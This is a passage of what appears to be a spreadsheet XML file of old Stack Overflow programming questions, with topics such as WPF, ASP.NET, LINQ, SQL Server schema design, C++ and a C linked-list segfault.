&lt;p&gt;But ::MoveWindow needs the dimensions WITH the border space added in.&lt;/p&gt;
&lt;p&gt;SOMEbody must have done this before...
Thanks for any help :)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.net: Display PDF in a asp.net web page</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;User click on a link button and it will direct them to a url that is dynmaically generated which a pdf file. The browser will prompt the user to either save or open it.&lt;/p&gt;
&lt;p&gt;I want to know if it is possible to downlaod the pdf file to the server then show the pdf file in the asp.net web page. When i google on this question, 99% of top link are some third party component. Is it a way to do this without purchase any 3rd party component?&lt;/p&gt;
&lt;p&gt;thank&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Storing Images to use in application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to store some images to use in my C# application.  They are png files and are currently in a folder with the dlls.  Ideally I would like to have them included with the dll so i dont have to include the actual images with the installation.  &lt;/p&gt;
&lt;p&gt;What is the best way to do this?&lt;/p&gt;
&lt;p&gt;I have though about resx but i am unsure as to the best way to go about it.  Should I use create the resx file using another project, and then add it to the one I want to use it with?&lt;/p&gt;
&lt;p&gt;Thanks in advance.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to render decoded HTML in a (i.e. a &lt;br&gt;) in GridView cell</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm binding a GridView to an LINQ query. Some of the fields in the objects created by the LINQ statement are strings, and need to contain new lines.&lt;/p&gt;
&lt;p&gt;Apparently, GridView HTML-encodes everything in each cell, so I can't insert a &amp;lt;br /&amp;gt; to create a new line within a cell.&lt;/p&gt;
&lt;p&gt;How do I tell GridView not to HTML encode the contents of cells?&lt;/p&gt;
&lt;p&gt;Maybe I should use a different control instead?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is possible send a array in Obj-c for a variable arguments function?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In python it is easy to build a dictionary or array and pass it unpacked to a function with variable parameters&lt;/p&gt;
&lt;p&gt;I have this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;- (BOOL) executeUpdate:(NSString*)sql, ... {
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And the manual way is this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[db executeUpdate:@"insert into test (a, b, c, d, e) values (?, ?, ?, ?, ?)" ,
  @"hi'", // look!  I put in a ', and I'm not escaping it!
  [NSString stringWithFormat:@"number %d", i],
  [NSNumber numberWithInt:i],
  [NSDate date],
  [NSNumber numberWithFloat:2.2f]];
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But I can't hardcode the parameters I'm calling, I want:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;NSMutableArray *values = [NSMutableArray array];
for (NSString *fieldName in props) {
  ..
  ..
  [values addObject : value]
}
[db executeUpdate:@"insert into test (a, b, c, d, e) values (?, ?, ?, ?, ?)" ,??values];
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How to set default WPF Window Style in app.xaml?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to set the default Style for every window in my WPF Windows application in my app.xaml. So far i have this in app.xaml:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;Application.Resources&amp;gt;
    &amp;lt;ResourceDictionary&amp;gt;
        &amp;lt;Style x:Key="WindowStyle" TargetType="{x:Type Window}"&amp;gt;
            &amp;lt;Setter Property="Background" Value="Blue" /&amp;gt;
        &amp;lt;/Style&amp;gt;
    &amp;lt;/ResourceDictionary&amp;gt;
&amp;lt;/Application.Resources&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I can get the window to appear with this style when running the app (but not is VS designer) by specifically telling the window to use this style via:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Style="{DynamicResource WindowStyle}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This works, but is not ideal. So how do I:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Have all windows automatically use the style (so i don't have to specify it on every window)?&lt;/li&gt;
&lt;li&gt;Have VS designer show the style?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is Google Apps?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is google apps and why are so many startup companies using it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>3D Polygons in Python</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As far as I am aware there is no inbuilt polygon functionality for Python. I want to create a 3D map and figured that polygons would be the best way to go about it.&lt;/p&gt;
&lt;p&gt;Not wanting to reinvent the wheel I did some googling and found that there's a lot of Python stuff out there, but I couldn't find what I wanted. Thus before I reinvent the wheel (or invent it a whole), does anybody know of a Polygon system for Python?&lt;/p&gt;
&lt;p&gt;Note that it does need to be 3D (I found quite a few 2D ones). Note also that I am not interested in the displaying of them but in storing them and the datastructure within Python.&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Correct use of Lambda query</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Consider the following code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;       private static void WriteProcesses(StreamWriter sw, DateTime d) {
            sw.WriteLine("List of processes @ " + d.ToString());
            Process[] localAll = Process.GetProcesses().Where(o =&amp;gt; o.ProcessName.ToLower() != "svchost");            
            if(localAll.Length &amp;gt; 0) {
                for(int i = 0; i &amp;lt; localAll.Length; i++) {                    
                    sw.WriteLine("      " + localAll[i].ProcessName);
                }
            }
        }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But i get a red squiggly line saying:&lt;/p&gt;
&lt;p&gt;Cannot implicitly convert type System.Collections.Generic.IEnumerable' to 'System.Diagnostics.Process[]'. An explicit conversion exists (are you missing a cast?)   &lt;/p&gt;
&lt;p&gt;I tried changing the array to a List but didnt work.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Dynamic Proxy generation with LinFu</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am trying to build a dynamic proxy for an interface with LinFu. The proxy should just implement the getter methods of the properties that are defined by the interface and return for instance a value from a dictionary, where the key is the property name.&lt;/p&gt;
&lt;p&gt;&lt;a href="http://code.google.com/p/linfu/" rel="nofollow"&gt;link text&lt;/a&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to make sure redundant data is deleted in a many-to-many relationship</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to make sure some data is auto-deleted when there's no more references using cascade deletes. I'll explain with a &lt;em&gt;fake&lt;/em&gt; database based on Stack Overflow.&lt;/p&gt;
&lt;p&gt;I have a &lt;code&gt;Post&lt;/code&gt; table. Each post has zero to many Tags.&lt;/p&gt;
&lt;p&gt;So it should look like:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Post &amp;lt;-&gt; PostTags &amp;lt;-&gt; Tags&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;eg. &lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Post 1 has tags 'A', 'B', 'C' Post 2
  has tags 'C', 'D'.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;now, what i'm doing is that when i delete all the tags for post 2 (eg. &lt;code&gt;DELETE FROM PostTags WHERE PostId = 2&lt;/code&gt;), I would like tag 'D' to also be deleted because no one else if referencing it. I thought cascade deletes would handle this, but of course it's only if u cascade down from &lt;code&gt;Tag-&amp;gt;PostTags&lt;/code&gt; or &lt;code&gt;Post-&amp;gt;PostTags&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;I'm not sure how to handle this.&lt;/p&gt;
&lt;p&gt;I'm afraid that people will suggest using a trigger :( (extra complexity to the system).&lt;/p&gt;
&lt;p&gt;Thoughts?&lt;/p&gt;
&lt;p&gt;Note: DB is MS Sql2008.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why can I assign an existing reference to a literal value in C++?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Consider the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int ival = 1.01;
int &amp;amp;rval = 1.01; // error: non-const reference to a const value.
int &amp;amp;rval = ival;
rval = 1.01;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The first assignment of &amp;amp;rval to a literal value fails as expected.  If I comment out that line the code compiles and runs.  I understand why the initialization fails, but I'm confused why the assignment to rval works in the last line.  I didn't think it was allowed to assign a reference to a literal value.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt; Thanks for the quick answers.  I'm tempted to delete this to hide my shame, but I think I'll leave it here so everyone else can point and laugh.&lt;/p&gt;
&lt;p&gt;In my own defense, I'm working through the exercises in a book (C++ Primer) and this problem is about reference &lt;em&gt;initialization&lt;/em&gt;.  Still, it's pretty embarrassing to have so completely overlooked the point of a reference in the first place.  :)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Data Modeling: What is a good relational design when a table has several foreign key constrainst to a single table?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have 2 tables: 
1. Employees
2. Vouchers&lt;/p&gt;
&lt;p&gt;Employees table has a single primary key.
Vouchers table has 3 foreign key constraints referencing the Employees table.&lt;/p&gt;
&lt;p&gt;The following is a sample T-SQL script (not the actual table script) to create both tables and their relationship in SQL Server:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;IF OBJECT_ID('dbo.Vouchers') IS NOT NULL
    DROP TABLE dbo.Vouchers
IF OBJECT_ID('dbo.Employees') IS NOT NULL
    DROP TABLE dbo.Employees
GO
CREATE TABLE Employees
(
  ObjectID     INT    NOT NULL   PRIMARY KEY    IDENTITY
)
CREATE TABLE Vouchers
(
  ObjectID     INT    NOT NULL   PRIMARY KEY    IDENTITY,
  IssuedBy     INT,
  ReceivedBy   INT,
  ApprovedBy   INT,
  CONSTRAINT fk_Vouchers_Employees_IssuedBy FOREIGN KEY (IssuedBy)
                                    REFERENCES Employees (ObjectID)
                                    ON UPDATE CASCADE
                                    ON DELETE NO ACTION,
 CONSTRAINT fk_Vouchers_Employees_ReceivedBy FOREIGN KEY (ReceivedBy)
                                    REFERENCES Employees (ObjectID)
                                    ON UPDATE CASCADE
                                    ON DELETE NO ACTION,
 CONSTRAINT fk_Vouchers_Employees_ApprovedBy FOREIGN KEY (ApprovedBy)
                                    REFERENCES Employees (ObjectID)
                                    ON UPDATE CASCADE
                                    ON DELETE NO ACTION 
)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But an error is thrown:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Msg 1785, Level 16, State 0, Line 7
Introducing FOREIGN KEY constraint 'fk_Vouchers_Employees_ReceivedBy' on table 'Vouchers' may cause cycles or multiple cascade paths. Specify ON DELETE NO ACTION or ON UPDATE NO ACTION, or modify other FOREIGN KEY constraints.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I don't have an idea of what efficient solution is available here. The requirements on the relationship is that: whenever an Employee is deleted, the Voucher that references some of its columns to the Employee does not get deleted (ON DELETE CASCADE is not an option). Instead, the values of the columns (IssuedBy, ReceivedBy and/or ApprovedBy) that are referenced to the deleted Employee should be set to NULL (since the columns are NULLABLE).&lt;/p&gt;
&lt;p&gt;Many thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>As our favorite imperative languages gain functional constructs, should loops be considered a code smell?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In allusion to Dare Obasanjo's impressions on Map, Reduce, Filter (&lt;a href="http://www.25hoursaday.com/weblog/2008/06/16/FunctionalProgrammingInC30HowMapReduceFilterCanRockYourWorld.aspx" rel="nofollow"&gt;Functional Programming in C# 3.0: How Map/Reduce/Filter can Rock your World&lt;/a&gt;) "With these three building blocks, you could replace the majority of the procedural for loops in your application with a single line of code. C# 3.0 doesn't just stop there."&lt;/p&gt;
&lt;p&gt;Should we increasingly use them instead of loops?  And should be having loops(instead of those three building blocks of data manipulation) be one of the metrics for coding horrors on code reviews? And why?&lt;/p&gt;
&lt;p&gt;[NOTE] I'm not advocating fully functional programming on those codes that could be simply translated to loops(e.g. tail recursions)&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Asking for politer term.&lt;/em&gt; Considering that the phrase "code smell" is not so diplomatic, I posted another question &lt;a href="http://stackoverflow.com/questions/432492/whats-the-politer-word-for-code-smell"&gt;http://stackoverflow.com/questions/432492/whats-the-politer-word-for-code-smell&lt;/a&gt; about the right word for "code smell", er.. utterly bad code.  Should that phrase have a place in our programming parlance? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>System Views text in SQL Server 2005</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking for viewing the text of the system views and procedures in SQL Server 2005 using the object explorer or using sp_helptext.&lt;/p&gt;
&lt;p&gt;actually i am coming from the SQL Server 2000 background, where we have the feature of retreiving the code of the view and the stored procedure using SQL Server 2000 Enterprise manager directly, but still i am unable to find this feature in the SQL Server 2005 Management Studio and still looking for the same feature for getting the view and procedure text in SQL Server 2005.&lt;/p&gt;
&lt;p&gt;Kindly please help me in this.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the best way to save a one-to-many relationship in Linq2Sql?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to figure out the best way to save a simple one-to-many relationship in Linq2Sql.&lt;/p&gt;
&lt;p&gt;Lets assume we have the following POCO model (pseduo code btw):&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Person has zero to many Vechicles.&lt;/em&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class Person
{
    IList&amp;lt;Vehicle&amp;gt; Vehicle;
}
class Vehicle
{
    string Name;
    string Colour;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now, when i save a Person, i pass that poco object to the repository code (which happens to be L2S). I can save the person object fine. I usually do this.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;using (Db db = new Db())
{
    var newPerson = db.People.SingleOrDefault(p =&amp;gt; p.Id == person.Id) ?? new SqlContext.Person();
    // Left to right stuff.
    newPerson.Name = person.Name;
    newPerson.Age = person.Age;
    if (newPerson.Id &amp;lt;= 0)
        db.People.InsertOnSubmit(newPerson);
    db.SubmitChanges();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;i'm not sure where and how i should handle the list of vehicles the person might have? any suggestions?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a O(1) way in windows api to concatenate 2 files?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a O(1) way in windows API to concatenate 2 files?&lt;/p&gt;
&lt;p&gt;O(1) with respect to not having to read in the entire second file and write it out to the file you want to append to.   So as opposed to O(n) bytes processed. &lt;/p&gt;
&lt;p&gt;I think this should be possible at the file system driver level, and I don't think there is a user mode API available for this, but I thought I'd ask. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Animate a StackPanel when the property Visibility changes</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In WPF 3.5 (with SP1), I have simply &lt;strong&gt;StackPanel that I would like to animate when I change the property Visibility&lt;/strong&gt;. I have no idea of the height of this StackPanel since its content determines its height. So when I change the property of my StackPanel to Visible (progressPanel.Visibility = Visibility.Visible;) I would like to see an animation (probably an DoubleAnimationUsingKeyFrames from 0 to X). &lt;/p&gt;
&lt;p&gt;Moreover, I have multiple StackPanel that I would like to see with this behavior (so in the best case, I need something generic). &lt;strong&gt;Does anybody have an idea on how to do that?&lt;/strong&gt; &lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to get a user token from Logonuser for a user account with no password?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can you get a user token from Logonuser for a user account with no password?&lt;/p&gt;
&lt;p&gt;In particular Logonuser will fail for accounts that do not have passwords.&lt;br /&gt;
You can validate an account by checking for a blank password + checking for GetLastError() == ERROR_ACCOUNT_RESTRICTION.  &lt;/p&gt;
&lt;p&gt;But I need to actually get a token returned, so I need this function to succeed. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Naming: What would you call a rich API that wraps around a thin API</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a "thin" (SOAP) API that only knows how to set and get entities in the underlying system.&lt;/p&gt;
&lt;p&gt;I am about to to create a "rich" API that encapsulates the "thin" API and implements the logic that is required for complex operations that entail getting and setting several entities in specific order.&lt;/p&gt;
&lt;p&gt;Example: The rich API will be responsible for creating a new user account by creating a "Lead" entity that's linked to an "Account" entity via the thin API.&lt;/p&gt;
&lt;p&gt;I'm stuck in a naming block so I turn to SO ;)   What name would you give my rich API? "xxxRichAPI"? "xxxHelper"? "xxxService"? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Writing custom IEnumerator&lt;T&gt; with iterators</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I write a custom &lt;code&gt;IEnumerator&amp;lt;T&amp;gt;&lt;/code&gt; implementation which needs to maintain some state and still get to use iterator blocks to simplify it? The best I can come up with is something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class MyEnumerator&amp;lt;T&amp;gt; : IEnumerator&amp;lt;T&amp;gt; {
    private IEnumerator&amp;lt;T&amp;gt; _enumerator;
    public int Position {get; private set;} // or some other custom properties
    public MyEnumerator() {
        Position = 0;
        _enumerator = MakeEnumerator();
    }
    private IEnumerator&amp;lt;T&amp;gt; MakeEnumerator() {
        // yield return something depending on Position
    } 
    public bool MoveNext() {
        bool res = _enumerator.MoveNext();
        if (res) Position++;
        return res;
    }
    // delegate Reset and Current to _enumerator as well
}
public class MyCollection&amp;lt;T&amp;gt; : IEnumerable&amp;lt;T&amp;gt; {
    IEnumerator&amp;lt;T&amp;gt; IEnumerable&amp;lt;T&amp;gt;.GetEnumerator() {
        return GetEnumerator();
    }
    public MyEnumerator&amp;lt;T&amp;gt; GetEnumerator() {
        return new MyEnumerator&amp;lt;T&amp;gt;();
    }
    ...
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>System.Net's Webclient in C# won't connect to server</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there something I need to do to get System.Net working with Microsoft Visual C# 2008 Express Edition? I can't seem to get any web type controls or classes to work at all.. the below WebClient example always throws the exception "&lt;strong&gt;Unable to connect to the remote server&lt;/strong&gt;".. and consequently I can't get the WebBrowser control to load a page either.&lt;/p&gt;
&lt;p&gt;Here is the code (Edited):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;using System;
using System.Text;
using System.Windows.Forms;
using System.IO;
using System.Net;
namespace WindowsFormsApplication1
{
    public partial class Form1 : Form
    {
        public Form1()
        {
            InitializeComponent();
            using (WebClient client = new WebClient()) {
                string s = client.DownloadString("http://www.google.com");
                this.textBox1.Text = s;
            }
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This is in a simple form with only a textbox control (with multiline set to true) in it. The exception gets thrown on the &lt;code&gt;DownloadString(...)&lt;/code&gt; line.  I also tried using &lt;code&gt;WebRequest&lt;/code&gt;.. same exception!&lt;/p&gt;
&lt;p&gt;EDIT:&lt;/p&gt;
&lt;p&gt;I am connected to a Linksys WRT54G Router that connects directly to my cable modem. I am not behind a proxy server, although I did run &lt;code&gt;proxycfg -u&lt;/code&gt; and I got:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Updated proxy settings
Current WinHTTP proxy settings under:
  HKEY_LOCAL_MACHINE\
    SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\
      WinHttpSettings :
 Direct access (no proxy server).
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I am using Windows XP and not running any kind of firewall. Only AVG at the moment. I'm pretty sure I shouldn't have to forward any ports or anything, but I did try forwarding port 80 to my workstation on my router. Didn't help.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I call an executable to run on a separate machine within a program on my own machine (win xp)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My objective is to write a program which will call another executable on a separate computer(all with win xp) with parameters determined at run-time, then repeat for several more computers, and then collect the results.  In short, I'm working on a grid-computing project.  The algorithm itself being used is already coded in FORTRAN, but we are looking for an efficient way to run it on many computers at once.&lt;/p&gt;
&lt;p&gt;I suppose one way to accomplish this would be to upload a script to each computer and then run said script on each computer, all automatically and dependent on my own parameters.  But how can I write a program which will write to, upload, and run a script on a separate computer?&lt;/p&gt;
&lt;p&gt;I had considered GridGain, but the algorithm is already coded and in a different language, so that is ruled out.&lt;/p&gt;
&lt;p&gt;My current guess at accomplishing this task is using Expect (&lt;a href="http://en.wikipedia.org/wiki/Expect" rel="nofollow"&gt;wiki/Expect&lt;/a&gt;), but I have no knowledge of the tool.&lt;/p&gt;
&lt;p&gt;Any advice appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Bi-Directionnal Replication With SQL Server</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to make a bi-directionnal Replication with SQL Server ?&lt;/p&gt;
&lt;p&gt;(BDD 1) Table 1 &amp;lt;=&gt; (BDD 2) Table 1&lt;/p&gt;
&lt;p&gt;Thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Hyperlinks within "about" text for iphone application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm on the final stretch of my first simple iPhone application. I'm building an "about" view, with credits/info/etc.&lt;/p&gt;
&lt;p&gt;I am failing on the simplest thing: how can I embed hyperlinks into the text? I'm current using a UIView with a UILabel for the text.&lt;/p&gt;
&lt;p&gt;I've looked on here, and the sample apps, but not got anywhere. Should I use a UIWebView? &lt;/p&gt;
&lt;p&gt;Thx.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Automatic .toString() when calling a method?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I got the code of a former employee. There are many calls to methods like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;foo(val,...);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;where &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void foo(String s,...) {
  ...
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and val is an int.&lt;/p&gt;
&lt;p&gt;Of course, I get an error.&lt;/p&gt;
&lt;p&gt;As a workaround I pass ""+val to foo. I wonder if there is a better way.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Recommendations of a high volume log event viewer in a Java enviroment</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am in a situation where I would like to accept a LOT of log events controlled by me - notably the logging agent I am preparing for slf4j - and then analyze them interactively.&lt;/p&gt;
&lt;p&gt;I am not as such interested in a facility that presents formatted log files, but one that can accept log events as objects and allow me to sort and display on e.g. threads and timelines etc.&lt;/p&gt;
&lt;p&gt;Chainsaw could maybe be an option but is currently not compatible with logback which I use for technical reasons.&lt;/p&gt;
&lt;p&gt;Is there any project with stand alone viewers or embedded in an IDE which would be suitable for this kind of log handling.  I am aware that I am approaching what might be suitable for a profiler, so if there is a profiler projekt suitable for this kind of data acquisition and display where I can feed the event pipe, I would like to hear about it).&lt;/p&gt;
&lt;p&gt;Thanks for all feedback&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;Update 2009-03-19:  I have found that there is not a log viewer which allows me to see what I would like (a visual display of events with coordinates determined by day and time, etc), so I have decided to create a very terse XML format derived from the log4j XMLLayout   adapted to be as readable as possible while still being valid XML-snippets, and then use the Microsoft LogParser to extract the information I need for postprocessing in other tools.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>QNX c++ thread question</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a question concerning this code which I want to run on QNX:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class ConcreteThread : public Thread
{
public:
    ConcreteThread(int test)
    {
    	testNumber = test;
    }
    void *start_routine() 
    { 
    	for(int i = 0; i &amp;lt; 10; i++)
    	{
    		sleep(1);
    		cout &amp;lt;&amp;lt; testNumber &amp;lt;&amp;lt; endl;
    	}	
    }
private:
    int testNumber;
};
class Thread 
{
public:
    Thread(){};
    int Create()
    {
        pthread_t m_id;
        return pthread_create(&amp;amp;m_id, NULL, &amp;amp;(this-&amp;gt;start_routine_trampoline), this);
    }
protected:
    virtual void *start_routine() = 0;
private:
    static void *start_routine_trampoline(void *p)
    {
        Thread *pThis = (Thread *)p;
        return pThis-&amp;gt;start_routine();
    }
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Now, when I run this code without the sleep in *start_routine, it will simply print the number 10 times, before continuing on to the next line of code (sequential instead of parallel). However, when I use a sleep like in the code, it doesn't print any numbers at all and simply goes on to the next line of code. Why doesn't sleep work and how can I make a thread like this work, instead of running sequential?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Paletted textures with 8-bit alpha channel in OpenGL ES</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can I get paletted textures with RGB palette and 8-bit alpha channel in OpenGLÂ ES? (I am targetting the iPhone OpenGL ES implementation.) After peeking into the OpenGL documentation it seems to me that there is support for paletted textures with alpha in the palette, ie. the texture contains 8-bit indexes into a palette with 256 RGBA colors. I would like a texture that contains 8-bit indexes into an RGB palette &lt;em&gt;and&lt;/em&gt; a standalone 8-bit alpha channel. (IÂ am trying to save memory and 32-bit RGBA textures are quite a luxury.) Or is this supposed to be done by hand, ie. by creating two independent textures, one for the colors and one for the alpha map, and combining them manually?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Fluent interfaces and leaky abstractions</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is a fluent interface? I can't find a good definition of this, but all I get are long code examples in a language I am not very familiar with (e.g. C++).&lt;/p&gt;
&lt;p&gt;Also, what is a leaky abstraction?&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Lookup Tables Best Practices: DB Tables... or Enumerations</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;If we have to store the available positions at a company (i.e. Manager, Team Lead, ... etc). What are the best practices for storing it? I have two opinions with comments... "sure, welcoming yours"&lt;br/&gt;
&lt;b&gt;&lt;/p&gt;
&lt;ol&gt;
    &lt;li&gt;Storing it as DB table with columns ID and Name, and deal with it using queries and joins.&lt;/li&gt;
    &lt;li&gt;Storing it as Enum and forget about the DB table.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;/b&gt;
In my opinion, I will choose the first solution if I have changing items. So that I won't hard code these options as Enum.&lt;br/&gt;
I may choose the Enum solution, if I have no doubt that data won't change (for example, Gender: Male, Female). &lt;br/&gt;&lt;br/&gt;
&lt;b&gt;NOTE:&lt;/b&gt; I code in English, and the UI Culture may be Arabic. If I will work with the Enum Solution, I will hard code the culture-based strings in the presentation layer, is it okay from the best practices perspective!!!! &lt;br/&gt;&lt;br/&gt;
I would like to know your opinions and if my thoughts correspond to what is most recommended "Best Practices"?? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Entity Framework query with grouping (many to many)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a classical many to many scenario with three tables (students, courses, and third StudentsCourses assignment table).&lt;/p&gt;
&lt;p&gt;I'm using EF in my new project and EF designer doesn't create third table.
I need to select all cources along with number of students assigned to it.
Using plain SQL is very straightforward:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;select c.Id, c.Name, Count(sc.*) as StudentCount 
from Courses c left join StudentCourses sc on(c.Id=sc.CourseId)
group by c.Id, c.Name
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But I can't figure out how to translate this query to Linq to SQL.
Please advice.&lt;/p&gt;
&lt;p&gt;Thank you.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is WPF production ready?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm wondering if there are people out there with experience of WPF application development - and maybe more interesting - running WPF in production.&lt;/p&gt;
&lt;p&gt;Is it mature enough to use in larger projects? What are the obvious pitfalls? Any best practices? (Databinding in WPF seems pretty nifty but does it work in 'real' projects?)&lt;/p&gt;
&lt;p&gt;Thanks in advance!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Where do you download Linux source code?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Say I'm interested in the source for one particular Linux utility, like &lt;code&gt;factor&lt;/code&gt;.  Where can I find the source code for that utility?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Segfault from adding a variable</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm admittedly a straight-C newbie, but this has got me stumped. I'm working on a linked list implementation for practice, and I'm getting a segfault by simply adding a variable to the split_node function:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#include &amp;lt;stdio.h&amp;gt;
#include &amp;lt;string.h&amp;gt;
#include &amp;lt;stdlib.h&amp;gt;
struct Node {
	struct Node *child;
	char *content;
};
void print_list(struct Node node);
void split_node(struct Node *node, int position);
int main() {
	struct Node head, second, third;
	head.content = "first";
	second.content = "second";
	third.content = "i'm third";
	head.child = &amp;amp;second;
	second.child = &amp;amp;third;
	print_list(head);
	split_node(&amp;amp;head, 3);
	print_list(head);
	return 0;
}
void print_list(struct Node node) {
	printf("%s\n", node.content);
	if(node.child) print_list(*node.child);
}
    /*
    Split node into two nodes, with the first position characters of the node's content remaining with node, and the remainder being copied to the new node. (It doesn't yet truncate the first node's string, but does do the copy.)
    */
void split_node(struct Node *node, int position) {
